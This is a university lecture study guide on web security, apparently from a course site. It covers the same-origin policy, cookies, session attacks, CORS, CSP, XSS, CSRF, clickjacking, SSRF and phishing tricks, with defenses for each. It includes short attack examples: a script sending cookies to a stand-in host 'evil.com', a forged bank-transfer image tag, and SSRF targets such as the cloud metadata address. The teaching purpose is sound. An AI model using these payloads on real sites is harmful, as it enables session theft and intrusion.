pk.org: Computer Security/Lecture Notes

Network Protection -- Web Security

Study Guide

Paul Krzyzanowski – 2025-11-24

Web Security Study Guide

Evolution of browser security

Early web browsers were simple document viewers that displayed static HTML. They weren't interesting security targets because all dynamic behavior happened on servers. The browser just rendered what it received.

Modern browsers have become complete application platforms. They execute JavaScript code downloaded from servers, manipulate page content through the Document Object Model, make asynchronous requests back to servers, and access device sensors. This evolution created a much larger attack surface. More features mean more complexity, and more complexity means more opportunities for vulnerabilities.

WebAssembly extends this further by allowing browsers to execute compiled binary code from languages like C, C++, and Rust. While it runs in a sandbox (and has the same restrictions as JavaScript), the compiled nature makes it harder to detect malicious code compared to JavaScript source.

HTTP versus HTTPS

HTTP transmits everything in plaintext. Anyone monitoring network traffic can see the URLs you visit, page contents, form data, and cookies. This is particularly dangerous on public WiFi.

HTTPS encrypts all communication between browser and server using TLS. This protects against three key threats:

However, understand what HTTPS does NOT protect:

HTTPS provides a secure channel, but you must verify you're communicating with the right party.

Same-origin policy

The same-origin policy is the cornerstone of web security. It restricts how content from one origin can interact with content from another origin.

An origin is defined by three components: protocol (http vs https), hostname (including subdomains), and port number. All three must match for origins to be the same. If a port is not specified, the browser assumes port 80 for http and port 443 for https.
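The three-part comparison can be sketched in a few lines of Python. This is only an illustration of the rule stated above, not how any browser implements it; the helper names origin and same_origin are hypothetical.

```python
from urllib.parse import urlsplit

# Default ports the browser assumes when the URL does not name one.
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    """Return the (protocol, hostname, port) triple that defines an origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)

def same_origin(url_a, url_b):
    """Two URLs share an origin only if all three components match."""
    return origin(url_a) == origin(url_b)

reference = "http://www.example.com:80/page.html"
print(same_origin(reference, "http://www.example.com/dir/other.html"))  # path differs only
print(same_origin(reference, "https://www.example.com/page.html"))      # protocol differs
print(same_origin(reference, "http://example.com/page.html"))           # hostname differs
print(same_origin(reference, "http://www.example.com:8080/page.html"))  # port differs
```

Only the first comparison reports a match, because the path is not part of the origin.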

Examples using http://www.example.com:80/page.html as the reference:

The same-origin policy restricts:

The same-origin policy allows:

The distinction: you can embed or link to content, but you generally cannot read that content.

Passive content restrictions

The same-origin policy has interesting restrictions on passive content (non-executable content like images and CSS). While JavaScript can embed passive content from other origins, it cannot inspect that content:

These restrictions prevent scripts from stealing embedded content while still allowing the embedding necessary for the web to function.

Frames and isolation

An iframe embeds one web page within another. Advertisements, social media widgets, and embedded content typically use iframes. Each frame has the origin of the page loaded into it, and the browser applies the same-origin policy to isolate frames from one another. A script in the parent page cannot access the DOM of an iframe from a different origin, and vice versa.

Document Object Model (DOM)

The DOM represents an HTML document as a tree of objects that JavaScript can access and manipulate. This enables modern interactive web pages. The security concern is that if an attacker can inject JavaScript into your page, they can manipulate the DOM to change what users see, steal information, or redirect users. This is the basis of cross-site scripting attacks.

Cookies

Cookies are the primary mechanism for maintaining state in HTTP. The server sends a Set-Cookie header, the browser stores it, and the browser automatically includes it in subsequent requests to the same server.
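As a rough sketch of that exchange, the Python standard library's http.cookies module can build the Set-Cookie value a server would send and parse the Cookie header a browser would send back. The cookie name session_id, its value, and the particular attributes chosen here (Path, Secure, HttpOnly, SameSite=Lax) are assumptions for illustration.

```python
from http.cookies import SimpleCookie

def build_set_cookie(name, value):
    """Build the value of a Set-Cookie response header (server side)."""
    cookie = SimpleCookie()
    cookie[name] = value
    cookie[name]["path"] = "/"
    cookie[name]["secure"] = True      # only send over HTTPS
    cookie[name]["httponly"] = True    # hide from document.cookie in scripts
    cookie[name]["samesite"] = "Lax"   # limit sending on cross-site requests
    return cookie[name].OutputString()

def parse_cookie_header(header):
    """Parse the Cookie request header the browser sends back."""
    cookie = SimpleCookie()
    cookie.load(header)
    return {key: morsel.value for key, morsel in cookie.items()}

print("Set-Cookie:", build_set_cookie("session_id", "abc123"))
print(parse_cookie_header("session_id=abc123; theme=dark"))
```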

Cookies are used for three main purposes:

Session management (authentication cookies): These pass identification about a user's login session. When you log in, the server sends a cookie with a session ID. This cookie is sent with every subsequent request so the server can identify you. This is why Amazon and Facebook don't prompt you for login every time you visit. Session management cookies may also pass shopping cart identifiers, even if you're not logged in.

Personalization: These identify user preferences such as font sizes, types of content to present, or language preferences. They may also include data that will be pre-filled into web forms.

Tracking: These monitor user activity across visits. If a browser doesn't send a cookie on a page request, the server creates a new cookie with a unique identifier. The server logs each page visit with that user's identifier. If you later log in or create an account, the server can associate all the tracked data with your specific user account.

Even though we refer to cookies as authentication cookies or tracking cookies, they all use the same mechanism. It's just a matter of how applications use them.

Critical security attributes you need to know:

Important: cookies don't follow the same-origin policy. They're scoped by domain and path, not by port, and this is intentional. This mismatch creates security issues that can be exploited in CSRF attacks.

Session management vulnerabilities

After login, servers typically set a session cookie containing a session ID. This ID identifies you in subsequent requests. Several attacks target this mechanism:

Session hijacking is when an attacker obtains your session ID and uses it to impersonate you. This can happen through:

Session fixation is when an attacker sets your session ID to a value they know before you log in. The attack sequence:

  1. Attacker obtains a valid session ID from the target site

  2. Attacker tricks you into using this session ID (through a crafted URL)

  3. You log in using the attacker's session ID

  4. The site authenticates you, but keeps the same session ID

  5. The attacker now has a valid, authenticated session as you

Defense: Always regenerate session IDs after successful login.

Inadequate session expiration means sessions remain valid too long. Stolen session IDs can be used indefinitely if sessions never expire. Sessions should expire after inactivity and have an absolute maximum lifetime.
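The two defenses above, regenerating the session ID at login and expiring sessions, might look roughly like this in a server-side session store. This is a minimal in-memory sketch: the class name SessionStore, the timeout values, and the injectable clock are all assumptions made for the example.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60            # assumed: expire after 15 minutes of inactivity
ABSOLUTE_LIFETIME = 8 * 60 * 60   # assumed: expire 8 hours after creation

class SessionStore:
    def __init__(self, clock=time.time):
        self._sessions = {}
        self._clock = clock

    def create(self, user=None):
        """Create a session with a fresh, unpredictable ID."""
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = {"user": user, "created": now, "last_seen": now}
        return sid

    def login(self, old_sid, user):
        """Discard the pre-login ID and issue a new one (defeats fixation)."""
        self._sessions.pop(old_sid, None)
        return self.create(user)

    def lookup(self, sid):
        """Return the session, or None if it is unknown or expired."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        idle = now - session["last_seen"]
        age = now - session["created"]
        if idle > IDLE_TIMEOUT or age > ABSOLUTE_LIFETIME:
            del self._sessions[sid]
            return None
        session["last_seen"] = now
        return session
```

An attacker who planted the pre-login ID gains nothing, because that ID stops being valid the moment the victim logs in.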

Cross-Origin Resource Sharing (CORS)

Sometimes web applications legitimately need to make cross-origin requests. For example, a single-page app at app.example.com might need to fetch data from an API at api.example.com.

CORS allows servers to relax the same-origin policy in a controlled way using HTTP headers. The browser sends an Origin header with the request. The server responds with Access-Control-Allow-Origin indicating which origins are permitted. If the origin matches, the browser allows JavaScript to read the response.
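On the server side, the decision described above can be sketched as a lookup against a list of permitted origins. The function name cors_headers and the allowed origin https://app.example.com are assumptions for this example; real frameworks typically provide this logic as middleware.

```python
# Origins this hypothetical API is willing to share responses with.
ALLOWED_ORIGINS = {"https://app.example.com"}

def cors_headers(request_origin):
    """Return the CORS response headers for a request's Origin header."""
    if request_origin in ALLOWED_ORIGINS:
        return {
            "Access-Control-Allow-Origin": request_origin,
            # The response varies by Origin, so caches must key on it.
            "Vary": "Origin",
        }
    # No header: the browser will not let the calling script read the response.
    return {}

print(cors_headers("https://app.example.com"))
print(cors_headers("https://evil.example.net"))
```

Note that the server still receives and processes the request in both cases; the header only controls whether the browser lets the calling script read the response.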

Key points:

Content Security Policy (CSP)

CSP helps prevent cross-site scripting and code injection attacks. It's implemented through an HTTP response header that specifies which resources the browser is allowed to load.

Example: Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com

This says resources should only load from the same origin by default, but scripts can additionally load from the specified CDN.

The key concept: CSP provides a whitelist of trusted sources. Even if an attacker injects HTML trying to load a malicious script, the browser blocks it if it doesn't come from an allowed source. This is defense in depth: even if input validation fails and XSS is possible, CSP can prevent the malicious script from executing.
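A server usually assembles this header from a table of directives. The helper below is a small sketch of that step (the name build_csp is hypothetical); it reproduces the example policy shown earlier.

```python
def build_csp(policy):
    """Join {directive: [sources]} into a Content-Security-Policy header value."""
    return "; ".join(
        f"{directive} {' '.join(sources)}" for directive, sources in policy.items()
    )

policy = {
    "default-src": ["'self'"],
    "script-src": ["'self'", "https://cdn.example.com"],
}
print("Content-Security-Policy:", build_csp(policy))
```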

The challenge of input validation

The advice "validate all input" is deceptively simple. The problem is that what constitutes valid input depends entirely on context. The same data might be safe in one context but dangerous in another.

Consider the name O'Brien:

You cannot check if input is "safe" in general. You must validate or encode based on how the data will be used. This is context-dependent at multiple layers. HTML encoding turns < into &lt;, which works for HTML content. But if you're inserting data into a JavaScript string within an HTML page, you need JavaScript encoding, not HTML encoding.
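To make the context dependence concrete, the sketch below encodes the same values for two destinations: HTML content and a JavaScript string literal inside an HTML page. The function names are hypothetical, and escaping <, >, and & inside the JavaScript literal is one common approach rather than the only one.

```python
import html
import json

def for_html(text):
    """Encode text for insertion into HTML content or a quoted attribute."""
    return html.escape(text, quote=True)

def for_js_string(text):
    """Encode text as a JavaScript string literal embedded in an HTML page.

    json.dumps handles quotes and backslashes; the extra replacements keep
    sequences such as </script> from ending the enclosing script element.
    """
    literal = json.dumps(text)
    return (
        literal.replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )

name = "O'Brien"
print(for_html(name))        # apostrophe becomes an HTML character reference
print(for_js_string(name))   # apostrophe is harmless inside a double-quoted literal
print(for_html("</script>"))
print(for_js_string("</script>"))
```

The two functions produce different output for the same input, which is the point: the right encoding is determined by where the data is going, not by the data itself.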

Cross-site scripting (XSS)

XSS is an attack where an attacker injects malicious scripts into web pages viewed by other users. When victims visit the page, the script executes in their browser with full access to the page's DOM, cookies (unless HttpOnly), and session storage.

Stored XSS: The malicious script is permanently stored on the target server (in a database, comment field, forum post). When other users view the page containing the stored data, the script executes.

Example: Attacker posts a comment containing <script>document.location='http://evil.com/steal?cookie='+document.cookie;</script>. When users view the comment, their cookies are sent to the attacker's server.

Reflected XSS: The malicious script is reflected back to the user immediately in the server's response. Typically occurs when user input is included in the response without proper sanitization.

Example: A search page displays "You searched for: [query]" and the query contains <script>alert('XSS')</script>. Attackers trick victims into clicking malicious links through phishing.

DOM-based XSS: The vulnerability exists entirely in client-side JavaScript that processes user input unsafely. The malicious data never goes to the server but is processed directly in the browser.

Example: JavaScript that reads a URL parameter and inserts it directly into the page using innerHTML.
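The reflected case is the easiest to show in code. The sketch below contrasts a hypothetical search-page renderer that echoes the query verbatim with one that HTML-encodes it first; the function names are invented for the example, and output encoding is only one layer of a full defense.

```python
import html

def render_results_unsafe(query):
    """Vulnerable: the query is copied into the page as-is."""
    return f"<p>You searched for: {query}</p>"

def render_results_safe(query):
    """Safer: the query is HTML-encoded, so the browser shows it as text."""
    return f"<p>You searched for: {html.escape(query)}</p>"

payload = "<script>alert('XSS')</script>"
print(render_results_unsafe(payload))  # contains a live script element
print(render_results_safe(payload))    # contains only inert text
```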

Prevention:

Cross-site request forgery (CSRF)

CSRF tricks a victim's browser into making unwanted requests to a web application where the victim is authenticated. It exploits the fact that browsers automatically include cookies with requests, even when those requests originate from other sites.

Attack scenario: You're logged into your bank at bank.com, which sets a session cookie. You then visit evil.com while still logged in. The malicious site contains:

<img src="https://bank.com/transfer?to=attacker&amount=1000">

Your browser automatically makes a GET request to bank.com/transfer and includes your bank.com cookies. If the bank relies solely on session cookies for authentication, the transfer succeeds.

The attack works because:

  1. The browser automatically includes cookies with requests

  2. The bank cannot distinguish this request from a legitimate one

  3. The same-origin policy doesn't prevent making the request, only reading the response
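One widely used countermeasure is a CSRF token: a secret value tied to the session that the site embeds in its own forms and that a page on another origin cannot read. The sketch below derives the token from the session ID with an HMAC; the function names and the choice of HMAC-SHA256 are assumptions for illustration, not a prescribed design.

```python
import hashlib
import hmac
import secrets

# Server-side secret; in practice this would be loaded from configuration.
SERVER_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    """Derive a token bound to this session, to embed in the site's own forms."""
    return hmac.new(SERVER_KEY, session_id.encode("utf-8"), hashlib.sha256).hexdigest()

def is_valid_csrf_token(session_id, submitted_token):
    """Accept a state-changing request only if it carries the right token."""
    expected = issue_csrf_token(session_id)
    submitted = (submitted_token or "").encode("utf-8")
    return hmac.compare_digest(expected.encode("utf-8"), submitted)

token = issue_csrf_token("session-abc")
print(is_valid_csrf_token("session-abc", token))  # legitimate form submission
print(is_valid_csrf_token("session-abc", None))   # forged request: cookie only, no token
```

The forged image request from evil.com still carries the session cookie, but it cannot include the token, so the server can tell the two requests apart.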

Prevention strategies:

Clickjacking

Clickjacking tricks users into clicking something different from what they perceive. The attacker embeds the target site in a transparent iframe positioned over a decoy element.

Example: An attacker creates a page saying "Click here to win a free iPad!" but places a transparent iframe containing your bank's "confirm transfer" button precisely where users will click. When victims click for their prize, they're actually clicking the hidden bank button.

Prevention:

JavaScript-based frame-busting approaches are not reliable. HTTP headers are the preferred solution.
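The headers generally used for this are X-Frame-Options and the frame-ancestors directive of Content-Security-Policy. A minimal sketch of a helper that picks them follows; the function name and its allow_same_origin parameter are hypothetical.

```python
def anti_framing_headers(allow_same_origin=False):
    """Return response headers that tell browsers who may frame this page."""
    if allow_same_origin:
        return {
            "X-Frame-Options": "SAMEORIGIN",
            "Content-Security-Policy": "frame-ancestors 'self'",
        }
    return {
        "X-Frame-Options": "DENY",
        "Content-Security-Policy": "frame-ancestors 'none'",
    }

print(anti_framing_headers())
print(anti_framing_headers(allow_same_origin=True))
```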

Server-side request forgery (SSRF)

SSRF is when an attacker causes a server to make HTTP requests to unintended locations. This can expose internal services, bypass firewall restrictions, or access cloud metadata services.

Example: A web application fetches content from user-provided URLs. An attacker requests http://localhost/admin or http://169.254.169.254/latest/meta-data/ (the cloud metadata service). The server makes requests to these URLs, which might not be accessible from the public internet but are accessible from the server itself. In cloud environments, metadata services can contain sensitive information like API credentials.

Prevention: Whitelist allowed destinations, block private IP ranges and cloud metadata services, use proper URL parsing to validate hostnames, disable or limit redirects, and use network segmentation to isolate web applications from sensitive internal services.
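Several of these checks can be combined in a validation step that runs before the server fetches anything. The sketch below is deliberately conservative and incomplete (it does not handle redirects or DNS changes between the check and the fetch); the function names, the injectable resolver, and the host images.example.com are assumptions for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def is_forbidden_ip(ip_text):
    """True for loopback, private, link-local (cloud metadata), and similar ranges."""
    ip = ipaddress.ip_address(ip_text.split("%")[0])  # drop any IPv6 zone suffix
    return (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_reserved or ip.is_multicast or ip.is_unspecified
    )

def resolve_host(host):
    """Resolve a hostname to the set of IP addresses it currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_url_allowed(url, allowed_hosts, resolver=resolve_host):
    """Allow only http(s) URLs whose host is whitelisted and resolves publicly."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if host is None or host not in allowed_hosts:
        return False
    try:
        addresses = resolver(host)
    except OSError:
        return False
    return bool(addresses) and not any(is_forbidden_ip(a) for a in addresses)

allowed = {"images.example.com"}
print(is_url_allowed("http://localhost/admin", allowed))
print(is_url_allowed("http://169.254.169.254/latest/meta-data/", allowed))
```

Checking the resolved addresses as well as the hostname matters because an allowed name can be pointed at an internal address through DNS.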

MIME sniffing attack

Passive content (images, videos, stylesheets) is considered to have no authority because it cannot execute scripts or interact with the DOM. However, browsers sometimes perform MIME sniffing, trying to guess the content type based on actual content rather than the declared MIME type.

Attackers exploit this by uploading malicious content disguised as passive content. For example, an attacker uploads a file crafted to look like an image but containing JavaScript code. The file is declared as an image (Content-Type: image/jpeg), and the server accepts it. When a browser requests this file and performs MIME sniffing, it may decide the content looks like HTML or JavaScript and execute it as a script rather than treating it as an image.

This allows the attacker to inject and execute malicious code, bypassing server-side input validation that only checks file extensions or declared content types.

Defense: Web servers should include the X-Content-Type-Options: nosniff header, which instructs browsers not to perform MIME sniffing and to strictly interpret content based on its declared Content-Type.
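A server that hosts uploads might pair that header with a check that the file's leading bytes match its declared type. The sketch below shows both pieces; the function names are hypothetical, only two image formats are covered, and a signature check alone will not catch every crafted file.

```python
# Leading "magic" bytes for the two formats this sketch accepts.
SIGNATURES = {
    "image/jpeg": b"\xff\xd8\xff",
    "image/png": b"\x89PNG\r\n\x1a\n",
}

def matches_declared_type(data, declared_type):
    """Check that uploaded bytes start with the signature of the declared type."""
    signature = SIGNATURES.get(declared_type)
    return signature is not None and data.startswith(signature)

def upload_response_headers(content_type):
    """Headers for serving an upload: declared type plus the nosniff instruction."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
    }

print(matches_declared_type(b"\xff\xd8\xff\xe0 rest of file", "image/jpeg"))
print(matches_declared_type(b"<script>alert(1)</script>", "image/jpeg"))
print(upload_response_headers("image/jpeg"))
```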

User tracking

Beyond direct security attacks, web technology enables extensive tracking of user behavior across sites.

Third-party cookies: When you visit shopping.com that includes an image from adnetwork.com, that ad network can set a cookie. Later, when you visit news.com that also includes content from adnetwork.com, your browser sends that cookie. The ad network now knows the same user visited both sites. Over time, this builds a profile of your browsing across all sites using that ad network.

Modern browsers defend against this by blocking third-party cookies by default (Safari, Firefox) or partitioning storage by top-level site so third-party cookies are isolated per site.

Tracking pixels: A tiny, typically transparent image embedded in a page or email. When your browser loads it, the server records information about the visit. If it sets a cookie, it can track you across visits and sites. Used for web analytics, conversion tracking, email tracking (detecting when emails are opened), and retargeting (serving ads for products you previously viewed).

Browser fingerprinting: Identifying browsers based on their unique combination of characteristics, including browser version, operating system, screen resolution, installed fonts, time zone, canvas rendering, WebGL information, and audio processing. These attributes often create a unique fingerprint that can identify a specific browser even without cookies. Harder to defend against because it doesn't rely on storing data in the browser.
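Conceptually, a fingerprint is just a stable hash over whatever attributes a script can observe. The sketch below illustrates the idea with a handful of made-up attribute values; real fingerprinting code collects these in the browser, and the function name fingerprint is hypothetical.

```python
import hashlib
import json

def fingerprint(attributes):
    """Hash a dictionary of observed browser attributes into one identifier."""
    canonical = json.dumps(attributes, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()

# Illustrative values only.
visitor = {
    "browser": "ExampleBrowser 1.0",
    "os": "ExampleOS",
    "screen": "2560x1440",
    "timezone": "America/New_York",
    "fonts": ["Arial", "Helvetica", "Fira Code"],
}
print(fingerprint(visitor))
```

Nothing is stored on the client, so clearing cookies does not change the result; only changing the underlying attributes does.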

Social engineering and user deception

Homograph attacks: Exploiting Unicode characters that look similar to ASCII characters. An attacker registers pаypal.com (with a Cyrillic 'а') which usually looks identical to paypal.com but is a completely different domain. Other confusable characters include Cyrillic 'о' versus Latin 'o', and the number '1' versus lowercase 'L' versus uppercase 'I'. Modern browsers defend against this by warning about mixed-script domains or displaying them in their encoded (Punycode) form, but these defenses aren't perfect.

Subdomain tricks and misleading domain names (combosquatting and typosquatting): Creating domains like paypal.com.evil-site.com or login-paypal.com-secure.phishing.com. Users who don't carefully read the full domain from right to left might be deceived. The actual domain is the label that comes immediately before the final top-level domain: evil-site.com and phishing.com in these examples.

Visual spoofing: Websites display fake certification logos, copy legitimate brand designs, create fake browser warnings, or make fake close buttons that actually link to malicious content. Users should verify security claims through independent channels.

Status bar spoofing: JavaScript can change a link's destination after the status bar displays a benign URL. When you hover, you see the legitimate URL, but clicking takes you elsewhere. Typing URLs directly or using bookmarks is safer for critical sites.

HTTPS security: HTTPS only means the connection is encrypted, not that the site is trustworthy. An attacker can get valid certificates for their own malicious domains. Users may mistake a secure connection for a trustworthy one.
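Two of the deceptions above, homograph domains and misleading subdomains, lend themselves to simple automated checks. The sketch below is a rough approximation: it uses the first word of each character's Unicode name as a stand-in for its script, and it treats the last two labels as the registered domain, which is wrong for suffixes such as co.uk. The function names are hypothetical.

```python
import unicodedata

def scripts_in(label):
    """Approximate the scripts in a label from each letter's Unicode name."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return scripts

def is_mixed_script(hostname):
    """True if any single label mixes letters from more than one script."""
    return any(len(scripts_in(label)) > 1 for label in hostname.split("."))

def naive_registered_domain(hostname):
    """Simplification: take the last two labels as the registered domain."""
    labels = hostname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

# "\u0430" is the Cyrillic letter that resembles a Latin 'a'.
print(is_mixed_script("p\u0430ypal.com"))
print(is_mixed_script("paypal.com"))
print(naive_registered_domain("paypal.com.evil-site.com"))
print(naive_registered_domain("login-paypal.com-secure.phishing.com"))
```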


Terms you should know